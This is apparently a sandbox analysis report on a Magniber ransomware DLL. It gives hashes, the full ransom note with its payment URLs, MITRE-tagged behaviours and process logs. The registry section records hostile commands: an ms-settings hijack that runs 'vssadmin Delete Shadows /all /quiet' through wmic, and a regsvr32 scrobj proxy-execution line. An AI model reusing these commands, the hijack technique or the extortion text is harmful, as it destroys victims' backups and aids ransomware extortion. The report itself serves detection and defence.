magniber | b8509f34589fa23a5d2db7d84b70a351f8bf928a789b45f0f10168b48319ecb9

Analysis

max time kernel
149s
max time network
151s
platform
windows10-2004_x64
resource
win10v2004-20241007-en
resource tags

arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system
submitted
06-12-2024 04:21

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

cb0261d9a3e77ffecdb51914b3690f18_JaffaCakes118.dll
Size

20KB
MD5

cb0261d9a3e77ffecdb51914b3690f18
SHA1

9f2604c82b06cc7b74f354afa8daebec9e66fb83
SHA256

b8509f34589fa23a5d2db7d84b70a351f8bf928a789b45f0f10168b48319ecb9
SHA512

8ad0761d452013f47a1805360057dec90c1016c76c80781e8420a4f29824687b0b396031521192d291055f125c96a87100cbe931d682b40e6e9edcb6acd39364
SSDEEP

384:JV0mpLDSVriGcs3QhglYdOKgnoRoeo//HRpADW8qw4yyydir9r/WX7BBunmoFYfY:JyWLWVriGu6Yw7noRK/HRpADV4yysi5e

Score

10^/10

magniber defense_evasion discovery execution impact ransomware

Malware Config

Extracted

Path

C:\Users\Admin\Pictures\readme.txt

Family

magniber

Ransom Note

ALL YOUR DOCUMENTS PHOTOS DATABASES AND OTHER IMPORTANT FILES HAVE BEEN ENCRYPTED! ==================================================================================================== Your files are NOT damaged! Your files are modified only. This modification is reversible. The only 1 way to decrypt your files is to receive the private key and decryption program. Any attempts to restore your files with the third party software will be fatal for your files! ==================================================================================================== To receive the private key and decryption program follow the instructions below: 1. Download "Tor Browser" from https://www.torproject.org/ and install it. 2. In the "Tor Browser" open your personal page here: http://78800e98f0cc24503uahnpdvb.m647u2xsjtlfyzuevlxjiiwjsg2btyhmbxbjz4in4hm76u6hjzc62wad.onion/uahnpdvb Note! This page is available via "Tor Browser" only. ==================================================================================================== Also you can use temporary addresses on your personal page without using "Tor Browser": http://78800e98f0cc24503uahnpdvb.iecard.top/uahnpdvb http://78800e98f0cc24503uahnpdvb.topsaid.site/uahnpdvb http://78800e98f0cc24503uahnpdvb.ourunit.xyz/uahnpdvb http://78800e98f0cc24503uahnpdvb.gosmark.space/uahnpdvb Note! These are temporary addresses! They will be available for a limited amount of time!

URLs

http://78800e98f0cc24503uahnpdvb.m647u2xsjtlfyzuevlxjiiwjsg2btyhmbxbjz4in4hm76u6hjzc62wad.onion/uahnpdvb

http://78800e98f0cc24503uahnpdvb.iecard.top/uahnpdvb

http://78800e98f0cc24503uahnpdvb.topsaid.site/uahnpdvb

http://78800e98f0cc24503uahnpdvb.ourunit.xyz/uahnpdvb

http://78800e98f0cc24503uahnpdvb.gosmark.space/uahnpdvb

Signatures

Detect magniber ransomware 1 IoCs

resource	yara_rule
behavioral2/memory/4028-0-0x000001F2DF890000-0x000001F2DFF0C000-memory.dmp	family_magniber

Magniber Ransomware
Ransomware family widely seen in Asia being distributed by the Magnitude exploit kit.
ransomware magniber
Magniber family
magniber

Process spawned unexpected child process 55 IoCs

This typically indicates the parent process was compromised via an exploit or macro.

description	pid	pid_target	Process	procid_target
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	5084	4884	cmd.exe	98
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	1152	4884	vssadmin.exe	98
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	5052	4884	cmd.exe	98
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	3696	4884	vssadmin.exe	98
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	5100	4884	vssadmin.exe	98
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	5688	4884	vssadmin.exe	98
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	5732	4884	cmd.exe	98
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	5780	4884	cmd.exe	98
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	6048	4884	vssadmin.exe	98
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	5320	4884	vssadmin.exe	98
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	1732	4884	vssadmin.exe	98
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	4788	4884	cmd.exe	98
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	5324	4884	cmd.exe	98
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	4724	4884	vssadmin.exe	98
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	5648	4884	vssadmin.exe	98
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	2672	4884	vssadmin.exe	98
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	4752	4884	cmd.exe	98
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	4656	4884	cmd.exe	98
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	5600	4884	vssadmin.exe	98
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	5424	4884	vssadmin.exe	98
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	5776	4884	cmd.exe	98
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	3728	4884	vssadmin.exe	98
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	3764	4884	cmd.exe	98
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	5944	4884	vssadmin.exe	98
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	5808	4884	vssadmin.exe	98
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	2068	4884	vssadmin.exe	98
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	3304	4884	vssadmin.exe	98
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	5524	4884	cmd.exe	98
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	2536	4884	cmd.exe	98
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	5124	4884	cmd.exe	98
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	5328	4884	cmd.exe	98
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	5060	4884	vssadmin.exe	98
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	3292	4884	vssadmin.exe	98
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	2656	4884	vssadmin.exe	98
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	2276	4884	vssadmin.exe	98
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	3088	4884	vssadmin.exe	98
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	5816	4884	cmd.exe	98
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	976	4884	cmd.exe	98
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	5192	4884	vssadmin.exe	98
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	5332	4884	vssadmin.exe	98
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	5900	4884	vssadmin.exe	98
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	5940	4884	cmd.exe	98
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	4596	4884	cmd.exe	98
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	1968	4884	vssadmin.exe	98
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	1768	4884	vssadmin.exe	98
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	5580	4884	vssadmin.exe	98
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	2240	4884	cmd.exe	98
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	3440	4884	cmd.exe	98
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	4224	4884	vssadmin.exe	98
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	5896	4884	cmd.exe	98
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	1320	4884	cmd.exe	98
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	3340	4884	vssadmin.exe	98
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	5072	4884	vssadmin.exe	98
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	2496	4884	vssadmin.exe	98
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	4972	4884	vssadmin.exe	98

Deletes shadow copies 3 TTPs
Ransomware often targets backup files to inhibit system recovery.
ransomware defense_evasion impact execution

File Deletion
T1070.004

Inhibit System Recovery
T1490

Windows Management Instrumentation
T1047
Renames multiple (62) files with added filename extension
This suggests ransomware activity of encrypting all the files on the system.
ransomware

Suspicious use of SetThreadContext 16 IoCs

description	pid	Process	procid_target
PID 4028 set thread context of 2648	4028	rundll32.exe	44
PID 4028 set thread context of 2676	4028	rundll32.exe	45
PID 4028 set thread context of 2808	4028	rundll32.exe	47
PID 4028 set thread context of 3472	4028	rundll32.exe	56
PID 4028 set thread context of 3640	4028	rundll32.exe	57
PID 4028 set thread context of 3844	4028	rundll32.exe	58
PID 4028 set thread context of 3940	4028	rundll32.exe	59
PID 4028 set thread context of 4008	4028	rundll32.exe	60
PID 4028 set thread context of 1040	4028	rundll32.exe	61
PID 4028 set thread context of 3512	4028	rundll32.exe	62
PID 4028 set thread context of 0	4028	rundll32.exe
PID 4028 set thread context of 2292	4028	rundll32.exe	64
PID 4028 set thread context of 4764	4028	rundll32.exe	75
PID 4028 set thread context of 1220	4028	rundll32.exe	77
PID 4028 set thread context of 2496	4028	rundll32.exe	78
PID 4028 set thread context of 2592	4028	rundll32.exe	83

Browser Information Discovery 1 TTPs
Enumerate browser information.
discovery

Browser Information Discovery
T1217
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Enumerates system info in registry 2 TTPs 3 IoCs

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	msedge.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer	msedge.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	msedge.exe

Interacts with shadow copies 3 TTPs 33 IoCs

Shadow copies are often targeted by ransomware to inhibit system recovery.

ransomware

File Deletion

T1070.004

Inhibit System Recovery

T1490

Direct Volume Access

T1006

pid	Process
6048	vssadmin.exe
5424	vssadmin.exe
1968	vssadmin.exe
5320	vssadmin.exe
3728	vssadmin.exe
2276	vssadmin.exe
5900	vssadmin.exe
3304	vssadmin.exe
1768	vssadmin.exe
3340	vssadmin.exe
2496	vssadmin.exe
1152	vssadmin.exe
3696	vssadmin.exe
1732	vssadmin.exe
5060	vssadmin.exe
5192	vssadmin.exe
5600	vssadmin.exe
3292	vssadmin.exe
3088	vssadmin.exe
5688	vssadmin.exe
4724	vssadmin.exe
5648	vssadmin.exe
5944	vssadmin.exe
5808	vssadmin.exe
4224	vssadmin.exe
2068	vssadmin.exe
2656	vssadmin.exe
5580	vssadmin.exe
5072	vssadmin.exe
4972	vssadmin.exe
5100	vssadmin.exe
2672	vssadmin.exe
5332	vssadmin.exe

Modifies Internet Explorer settings 1 TTPs 2 IoCs

adware spyware

Modify Registry

T1112

description	ioc	Process
Set value (str)	\REGISTRY\USER\S-1-5-21-2045521122-590294423-3465680274-1000\SOFTWARE\Microsoft\Internet Explorer\Main\WindowsSearch\Version = "WS not running"	Explorer.EXE
Set value (int)	\REGISTRY\USER\S-1-5-21-2045521122-590294423-3465680274-1000\SOFTWARE\Microsoft\Internet Explorer\IESettingSync\SlowSettingTypesChanged = "2"	Explorer.EXE

Modifies registry class 54 IoCs

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-21-2045521122-590294423-3465680274-1000_Classes\ms-settings\shell\open\command	rundll32.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2045521122-590294423-3465680274-1000_Classes\ms-settings\shell\open\command\DelegateExecute = "0"	rundll32.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2045521122-590294423-3465680274-1000_Classes\ms-settings\shell\open\command\ = "regsvr32.exe scrobj.dll /s /u /n /i:C:\\Users\\Public\\readme.txt"	RuntimeBroker.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2045521122-590294423-3465680274-1000_Classes\ms-settings\shell\open\command\ = "regsvr32.exe scrobj.dll /s /u /n /i:C:\\Users\\Public\\readme.txt"	RuntimeBroker.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2045521122-590294423-3465680274-1000_Classes\ms-settings\shell\open\command\ = "C:\\Windows\\system32\\wbem\\wmic process call create \"vssadmin.exe Delete Shadows /all /quiet\""	RuntimeBroker.exe
Key created	\REGISTRY\USER\S-1-5-21-2045521122-590294423-3465680274-1000_Classes\ms-settings\shell\open\command	sihost.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{4336a54d-038b-4685-ab02-99bb52d3fb8b}\Instance\	Explorer.EXE
Set value (int)	\REGISTRY\USER\S-1-5-21-2045521122-590294423-3465680274-1000_Classes\ms-settings\shell\open\command\DelegateExecute = "0"	RuntimeBroker.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2045521122-590294423-3465680274-1000_Classes\ms-settings\shell\open\command\ = "C:\\Windows\\system32\\wbem\\wmic process call create \"vssadmin.exe Delete Shadows /all /quiet\""	Explorer.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-2045521122-590294423-3465680274-1000_Classes\ms-settings\shell\open\command\ = "C:\\Windows\\system32\\wbem\\wmic process call create \"vssadmin.exe Delete Shadows /all /quiet\""	sihost.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2045521122-590294423-3465680274-1000_Classes\ms-settings\shell\open\command\ = "C:\\Windows\\system32\\wbem\\wmic process call create \"vssadmin.exe Delete Shadows /all /quiet\""	RuntimeBroker.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2045521122-590294423-3465680274-1000_Classes\ms-settings\shell\open\command\DelegateExecute = "0"	DllHost.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2045521122-590294423-3465680274-1000_Classes\ms-settings\shell\open\command\ = "regsvr32.exe scrobj.dll /s /u /n /i:C:\\Users\\Public\\readme.txt"	sihost.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2045521122-590294423-3465680274-1000_Classes\ms-settings\shell\open\command\ = "C:\\Windows\\system32\\wbem\\wmic process call create \"vssadmin.exe Delete Shadows /all /quiet\""	DllHost.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2045521122-590294423-3465680274-1000_Classes\ms-settings\shell\open\command\ = "regsvr32.exe scrobj.dll /s /u /n /i:C:\\Users\\Public\\readme.txt"	RuntimeBroker.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2045521122-590294423-3465680274-1000_Classes\ms-settings\shell\open\command\DelegateExecute = "0"	taskhostw.exe
Key created	\REGISTRY\USER\S-1-5-21-2045521122-590294423-3465680274-1000_Classes\ms-settings\shell\open\command	svchost.exe
Key created	\REGISTRY\USER\S-1-5-21-2045521122-590294423-3465680274-1000_Classes\CLSID\{018D5C66-4533-4307-9B53-224DE2ED1FE6}\Instance\	Explorer.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-2045521122-590294423-3465680274-1000_Classes\ms-settings\shell\open\command\ = "regsvr32.exe scrobj.dll /s /u /n /i:C:\\Users\\Public\\readme.txt"	rundll32.exe
Key created	\REGISTRY\USER\S-1-5-21-2045521122-590294423-3465680274-1000_Classes\ms-settings\shell\open\command	RuntimeBroker.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2045521122-590294423-3465680274-1000_Classes\ms-settings\shell\open\command\DelegateExecute = "0"	svchost.exe
Key created	\REGISTRY\USER\S-1-5-21-2045521122-590294423-3465680274-1000_Classes\ms-settings\shell\open\command	Explorer.EXE
Set value (int)	\REGISTRY\USER\S-1-5-21-2045521122-590294423-3465680274-1000_Classes\ms-settings\shell\open\command\DelegateExecute = "0"	Explorer.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{1f3427c8-5c10-4210-aa03-2ee45287d668}\Instance\	Explorer.EXE
Key created	\REGISTRY\USER\S-1-5-21-2045521122-590294423-3465680274-1000_Classes\ms-settings\shell\open\command	svchost.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2045521122-590294423-3465680274-1000_Classes\ms-settings\shell\open\command\ = "C:\\Windows\\system32\\wbem\\wmic process call create \"vssadmin.exe Delete Shadows /all /quiet\""	rundll32.exe
Key created	\REGISTRY\USER\S-1-5-21-2045521122-590294423-3465680274-1000_Classes\ms-settings	sihost.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2045521122-590294423-3465680274-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.Search_cw5n1h2txyewy\WasEverActivated = "1"	sihost.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2045521122-590294423-3465680274-1000_Classes\ms-settings\shell\open\command\DelegateExecute = "0"	RuntimeBroker.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2045521122-590294423-3465680274-1000_Classes\ms-settings\shell\open\command\ = "regsvr32.exe scrobj.dll /s /u /n /i:C:\\Users\\Public\\readme.txt"	Explorer.EXE
Set value (int)	\REGISTRY\USER\S-1-5-21-2045521122-590294423-3465680274-1000_Classes\ms-settings\shell\open\command\DelegateExecute = "0"	svchost.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2045521122-590294423-3465680274-1000_Classes\ms-settings\shell\open\command\ = "C:\\Windows\\system32\\wbem\\wmic process call create \"vssadmin.exe Delete Shadows /all /quiet\""	RuntimeBroker.exe
Key created	\REGISTRY\USER\S-1-5-21-2045521122-590294423-3465680274-1000_Classes\ms-settings\shell\open\command	RuntimeBroker.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2045521122-590294423-3465680274-1000_Classes\ms-settings\shell\open\command\DelegateExecute = "0"	RuntimeBroker.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2045521122-590294423-3465680274-1000_Classes\ms-settings\shell\open\command\ = "C:\\Windows\\system32\\wbem\\wmic process call create \"vssadmin.exe Delete Shadows /all /quiet\""	taskhostw.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2045521122-590294423-3465680274-1000_Classes\ms-settings\shell\open\command\DelegateExecute = "0"	RuntimeBroker.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2045521122-590294423-3465680274-1000_Classes\ms-settings\shell\open\command\ = "regsvr32.exe scrobj.dll /s /u /n /i:C:\\Users\\Public\\readme.txt"	svchost.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2045521122-590294423-3465680274-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.MicrosoftEdge.Stable_8wekyb3d8bbwe\WasEverActivated = "1"	sihost.exe
Key created	\REGISTRY\USER\S-1-5-21-2045521122-590294423-3465680274-1000_Classes\ms-settings\shell\open\command	RuntimeBroker.exe
Key created	\REGISTRY\USER\S-1-5-21-2045521122-590294423-3465680274-1000_Classes\ms-settings\shell\open\command	taskhostw.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2045521122-590294423-3465680274-1000_Classes\ms-settings\shell\open\command\ = "regsvr32.exe scrobj.dll /s /u /n /i:C:\\Users\\Public\\readme.txt"	taskhostw.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2045521122-590294423-3465680274-1000_Classes\ms-settings\shell\open\command\DelegateExecute = "0"	sihost.exe
Key created	\REGISTRY\USER\S-1-5-21-2045521122-590294423-3465680274-1000_Classes\ms-settings\shell\open\command	TextInputHost.exe
Key created	\REGISTRY\USER\S-1-5-21-2045521122-590294423-3465680274-1000_Classes\ms-settings\shell\open\command	StartMenuExperienceHost.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2045521122-590294423-3465680274-1000_Classes\ms-settings\shell\open\command\ = "C:\\Windows\\system32\\wbem\\wmic process call create \"vssadmin.exe Delete Shadows /all /quiet\""	RuntimeBroker.exe
Key created	\REGISTRY\USER\S-1-5-21-2045521122-590294423-3465680274-1000_Classes\ms-settings\shell	sihost.exe
Key created	\REGISTRY\USER\S-1-5-21-2045521122-590294423-3465680274-1000_Classes\ms-settings\shell\open	sihost.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2045521122-590294423-3465680274-1000_Classes\ms-settings\shell\open\command\ = "C:\\Windows\\system32\\wbem\\wmic process call create \"vssadmin.exe Delete Shadows /all /quiet\""	svchost.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2045521122-590294423-3465680274-1000_Classes\ms-settings\shell\open\command\ = "regsvr32.exe scrobj.dll /s /u /n /i:C:\\Users\\Public\\readme.txt"	DllHost.exe
Key created	\REGISTRY\USER\S-1-5-21-2045521122-590294423-3465680274-1000_Classes\ms-settings\shell\open\command	RuntimeBroker.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2045521122-590294423-3465680274-1000_Classes\ms-settings\shell\open\command\ = "regsvr32.exe scrobj.dll /s /u /n /i:C:\\Users\\Public\\readme.txt"	RuntimeBroker.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2045521122-590294423-3465680274-1000_Classes\ms-settings\shell\open\command\ = "C:\\Windows\\system32\\wbem\\wmic process call create \"vssadmin.exe Delete Shadows /all /quiet\""	svchost.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2045521122-590294423-3465680274-1000_Classes\ms-settings\shell\open\command\ = "regsvr32.exe scrobj.dll /s /u /n /i:C:\\Users\\Public\\readme.txt"	svchost.exe
Key created	\REGISTRY\USER\S-1-5-21-2045521122-590294423-3465680274-1000_Classes\ms-settings\shell\open\command	DllHost.exe

Opens file in notepad (likely ransom note) 1 IoCs

ransomware

pid	Process
2880	notepad.exe

Suspicious behavior: EnumeratesProcesses 12 IoCs

pid	Process
4028	rundll32.exe
4028	rundll32.exe
1072	msedge.exe
1072	msedge.exe
4268	msedge.exe
4268	msedge.exe
4636	identity_helper.exe
4636	identity_helper.exe
1192	msedge.exe
1192	msedge.exe
1192	msedge.exe
1192	msedge.exe

Suspicious behavior: GetForegroundWindowSpam 2 IoCs

pid	Process
3472	Explorer.EXE
2808	taskhostw.exe

Suspicious behavior: MapViewOfSection 16 IoCs

pid	Process
4028	rundll32.exe
4028	rundll32.exe
4028	rundll32.exe
4028	rundll32.exe
4028	rundll32.exe
4028	rundll32.exe
4028	rundll32.exe
4028	rundll32.exe
4028	rundll32.exe
4028	rundll32.exe
4028	rundll32.exe
4028	rundll32.exe
4028	rundll32.exe
4028	rundll32.exe
4028	rundll32.exe
4028	rundll32.exe

Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 10 IoCs

pid	Process
4268	msedge.exe
4268	msedge.exe
4268	msedge.exe
4268	msedge.exe
4268	msedge.exe
4268	msedge.exe
4268	msedge.exe
4268	msedge.exe
4268	msedge.exe
4268	msedge.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

description	pid	Process
Token: SeShutdownPrivilege	3472	Explorer.EXE
Token: SeCreatePagefilePrivilege	3472	Explorer.EXE
Token: SeShutdownPrivilege	3472	Explorer.EXE
Token: SeCreatePagefilePrivilege	3472	Explorer.EXE
Token: SeShutdownPrivilege	3472	Explorer.EXE
Token: SeCreatePagefilePrivilege	3472	Explorer.EXE
Token: SeShutdownPrivilege	3472	Explorer.EXE
Token: SeCreatePagefilePrivilege	3472	Explorer.EXE
Token: SeShutdownPrivilege	3472	Explorer.EXE
Token: SeCreatePagefilePrivilege	3472	Explorer.EXE
Token: SeShutdownPrivilege	3472	Explorer.EXE
Token: SeCreatePagefilePrivilege	3472	Explorer.EXE
Token: SeShutdownPrivilege	3472	Explorer.EXE
Token: SeCreatePagefilePrivilege	3472	Explorer.EXE
Token: SeShutdownPrivilege	3472	Explorer.EXE
Token: SeCreatePagefilePrivilege	3472	Explorer.EXE
Token: SeShutdownPrivilege	3472	Explorer.EXE
Token: SeCreatePagefilePrivilege	3472	Explorer.EXE
Token: SeShutdownPrivilege	3472	Explorer.EXE
Token: SeCreatePagefilePrivilege	3472	Explorer.EXE
Token: SeIncreaseQuotaPrivilege	3084	wmic.exe
Token: SeSecurityPrivilege	3084	wmic.exe
Token: SeTakeOwnershipPrivilege	3084	wmic.exe
Token: SeLoadDriverPrivilege	3084	wmic.exe
Token: SeSystemProfilePrivilege	3084	wmic.exe
Token: SeSystemtimePrivilege	3084	wmic.exe
Token: SeProfSingleProcessPrivilege	3084	wmic.exe
Token: SeIncBasePriorityPrivilege	3084	wmic.exe
Token: SeCreatePagefilePrivilege	3084	wmic.exe
Token: SeBackupPrivilege	3084	wmic.exe
Token: SeRestorePrivilege	3084	wmic.exe
Token: SeShutdownPrivilege	3084	wmic.exe
Token: SeDebugPrivilege	3084	wmic.exe
Token: SeSystemEnvironmentPrivilege	3084	wmic.exe
Token: SeRemoteShutdownPrivilege	3084	wmic.exe
Token: SeUndockPrivilege	3084	wmic.exe
Token: SeManageVolumePrivilege	3084	wmic.exe
Token: 33	3084	wmic.exe
Token: 34	3084	wmic.exe
Token: 35	3084	wmic.exe
Token: 36	3084	wmic.exe
Token: SeIncreaseQuotaPrivilege	4896	WMIC.exe
Token: SeSecurityPrivilege	4896	WMIC.exe
Token: SeTakeOwnershipPrivilege	4896	WMIC.exe
Token: SeLoadDriverPrivilege	4896	WMIC.exe
Token: SeSystemProfilePrivilege	4896	WMIC.exe
Token: SeSystemtimePrivilege	4896	WMIC.exe
Token: SeProfSingleProcessPrivilege	4896	WMIC.exe
Token: SeIncBasePriorityPrivilege	4896	WMIC.exe
Token: SeCreatePagefilePrivilege	4896	WMIC.exe
Token: SeBackupPrivilege	4896	WMIC.exe
Token: SeRestorePrivilege	4896	WMIC.exe
Token: SeShutdownPrivilege	4896	WMIC.exe
Token: SeDebugPrivilege	4896	WMIC.exe
Token: SeSystemEnvironmentPrivilege	4896	WMIC.exe
Token: SeRemoteShutdownPrivilege	4896	WMIC.exe
Token: SeUndockPrivilege	4896	WMIC.exe
Token: SeManageVolumePrivilege	4896	WMIC.exe
Token: 33	4896	WMIC.exe
Token: 34	4896	WMIC.exe
Token: 35	4896	WMIC.exe
Token: 36	4896	WMIC.exe
Token: SeIncreaseQuotaPrivilege	3180	WMIC.exe
Token: SeSecurityPrivilege	3180	WMIC.exe

Suspicious use of FindShellTrayWindow 25 IoCs

pid	Process
4268	msedge.exe
4268	msedge.exe
4268	msedge.exe
4268	msedge.exe
4268	msedge.exe
4268	msedge.exe
4268	msedge.exe
4268	msedge.exe
4268	msedge.exe
4268	msedge.exe
4268	msedge.exe
4268	msedge.exe
4268	msedge.exe
4268	msedge.exe
4268	msedge.exe
4268	msedge.exe
4268	msedge.exe
4268	msedge.exe
4268	msedge.exe
4268	msedge.exe
4268	msedge.exe
4268	msedge.exe
4268	msedge.exe
4268	msedge.exe
4268	msedge.exe

Suspicious use of SendNotifyMessage 24 IoCs

pid	Process
4268	msedge.exe
4268	msedge.exe
4268	msedge.exe
4268	msedge.exe
4268	msedge.exe
4268	msedge.exe
4268	msedge.exe
4268	msedge.exe
4268	msedge.exe
4268	msedge.exe
4268	msedge.exe
4268	msedge.exe
4268	msedge.exe
4268	msedge.exe
4268	msedge.exe
4268	msedge.exe
4268	msedge.exe
4268	msedge.exe
4268	msedge.exe
4268	msedge.exe
4268	msedge.exe
4268	msedge.exe
4268	msedge.exe
4268	msedge.exe

Suspicious use of UnmapMainImage 4 IoCs

pid	Process
2292	RuntimeBroker.exe
1220	RuntimeBroker.exe
4008	RuntimeBroker.exe
3512	RuntimeBroker.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 2648 wrote to memory of 2880	2648	sihost.exe	86
PID 2648 wrote to memory of 2880	2648	sihost.exe	86
PID 2648 wrote to memory of 2512	2648	sihost.exe	87
PID 2648 wrote to memory of 2512	2648	sihost.exe	87
PID 2648 wrote to memory of 3084	2648	sihost.exe	88
PID 2648 wrote to memory of 3084	2648	sihost.exe	88
PID 2648 wrote to memory of 1368	2648	sihost.exe	89
PID 2648 wrote to memory of 1368	2648	sihost.exe	89
PID 2648 wrote to memory of 4736	2648	sihost.exe	90
PID 2648 wrote to memory of 4736	2648	sihost.exe	90
PID 4736 wrote to memory of 4896	4736	cmd.exe	96
PID 4736 wrote to memory of 4896	4736	cmd.exe	96
PID 1368 wrote to memory of 3180	1368	cmd.exe	97
PID 1368 wrote to memory of 3180	1368	cmd.exe	97
PID 5052 wrote to memory of 4456	5052	cmd.exe	106
PID 5052 wrote to memory of 4456	5052	cmd.exe	106
PID 5084 wrote to memory of 1552	5084	cmd.exe	108
PID 5084 wrote to memory of 1552	5084	cmd.exe	108
PID 2512 wrote to memory of 4268	2512	cmd.exe	110
PID 2512 wrote to memory of 4268	2512	cmd.exe	110
PID 4268 wrote to memory of 4512	4268	msedge.exe	112
PID 4268 wrote to memory of 4512	4268	msedge.exe	112
PID 4764 wrote to memory of 4016	4764	TextInputHost.exe	113
PID 4764 wrote to memory of 4016	4764	TextInputHost.exe	113
